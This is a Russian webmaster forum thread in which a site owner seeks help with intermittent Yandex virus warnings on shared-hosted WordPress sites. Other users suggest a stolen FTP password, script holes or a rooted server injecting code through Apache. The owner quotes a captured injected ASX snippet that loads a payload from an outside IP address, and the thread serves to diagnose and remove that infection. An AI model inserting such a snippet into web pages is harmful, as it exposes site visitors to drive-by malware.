- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
У одного хостера я размещаю ~ 3-5 сайтов. Обычный shared хостинг, доступ через FTP панель.
Примерно 3 недели назад, в панели Яндекса, начали появляться статусы - сайт заражен вирусом.
Когда я заходил на сайт - ничего критичного в коде не замечал. Пробовал писать Яндексу, ничего вразумительного в ответ не получал. Через 1-2 дня (т.е. при следующей проверке) статус зараженности снимался. А через 2-3 дня появлялся снова! Так продолжается уже 3 недели точно. И вот удалось мне поймать код, который единожды встроился в html страницу:
<ASX VERSION="3.0">
<TITLE></TITLE>
<PARAM name="HTMLView" value="http://91.220.62.71/g5jewq/"/>
<ENTRY>
<REF href="http://91.220.62.71/g5jewq/euezglalhoyverbq.gif"/>
</ENTRY>
</ASX>
В FF выглядит это как попытка установить некий "компонент". Повторный рефреш страницы - снова пусто. Скачал полный дамп сайтов, искал по строчкам, ускал в sql дампе базы = ничего. Сейчас сменил все пароли.
Отсюда вопрос - возможно ли какое то глубокое заражение самого *nix сервера ? Т.е. выше уровня движка Wordpress ? Апача, каких то иных процессов (я не очень разбираюсь в *nix)?
да, вполне реально. лучше обратитесь к своему хостеру с этой проблемой
dima_1st,
Маловероятно, обычно в папку к "соседу" попасть нельзя. Это только у "талантливых" хостеров.
Не те строчки ищите. Ищите <java <javascript
или что-то в этом духе. У глубокое заражение сайта.
Ну и Вы уже поняли видимо, что проникает в 99% случаев вирус через зараженный компьютер с сохраненным паролем ФТП.
firstman добавил 23.03.2011 в 23:31
да, вполне реально. лучше обратитесь к своему хостеру с этой проблемой
А хостер тут причем? Вы хотите, чтобы этой трудоемкой задачей всегда занимался хостер? Искал по строчкам, отлаживал сайт после этого, писал в яндекс. У хостера есть гараздо более важные задачи, которые кроме него, никто не решит.
firstman,
> код, который единожды встроился в html страницу
> Повторный рефреш страницы - снова пусто. Скачал полный дамп сайтов, искал по строчкам, ускал в sql дампе базы = ничего.
по симптомам похоже на то, что хостера порутали и внедрили этот код в модуль апача.
ключевые слова: "рефреш страницы - снова пусто"
А хостер тут причем? Вы хотите, чтобы этой трудоемкой задачей всегда занимался хостер? Искал по строчкам,
Да, конечно, этим должен заниматься хостер, так как вполне вероятно, что это его вина.
> Искал по строчкам
хостеру будет несложно egrep`нуть ключевые слова по файлам клиента, тем более, что "талантливые" хсотеры не дают доступ к ssh
Отсюда вопрос - возможно ли какое то глубокое заражение самого *nix сервера ? Т.е. выше уровня движка Wordpress ? Апача, каких то иных процессов (я не очень разбираюсь в *nix)?
маловероятно, в первую очередь Вам стоит написать Вашей хостинговой компании о том, что на Вашем сайте стали появлятся вирусы. Есть 3 варианта:
1. У Вас украли данные от FTP (например трояном на компьютере)
2. Дырка в скриптах
3. Сосед может править Ваши файлы/кто-то угнал доступ администратора сервера.
Попросите Вашего хостера проверить, заходил ли кто-то под Вашим аккаунтом на FTP и спросите не жаловались другие пользователи на подобные проблемы. Написать им, в любом случае, надо.
> спросите не жаловались другие пользователи на подобные проблемы.
поддерживаю этого гражданина
Не те строчки ищите. Ищите <java <javascript
Спасибо, попробую.
firstman,
> код, который единожды встроился в html страницу
> Повторный рефреш страницы - снова пусто. Скачал полный дамп сайтов, искал по строчкам, ускал в sql дампе базы = ничего.
по симптомам похоже на то, что хостера порутали и внедрили этот код в модуль апача.
ключевые слова: "рефреш страницы - снова пусто"
Если "порутали", то вирусы на сайте, далеко не самое важное. В модуль апача? Тогда можно смело валить оттуда.
<java
<javascript
тоже пусто, так же проверил на eval в php :( тоже мимо.